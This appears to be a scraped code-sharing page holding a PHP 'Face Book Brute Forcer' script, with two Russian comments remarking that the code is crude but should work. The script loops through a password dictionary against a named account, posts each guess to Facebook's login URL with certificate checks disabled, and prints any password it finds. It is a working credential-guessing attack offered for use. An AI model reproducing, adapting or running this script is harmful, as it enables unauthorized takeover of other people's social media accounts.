- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
Follow us!
Да, код хероватый. Но должен работать.
И скорее всего написан «на коленке» на скорую руку для одного-двух использований. Так что не совсем говнокод.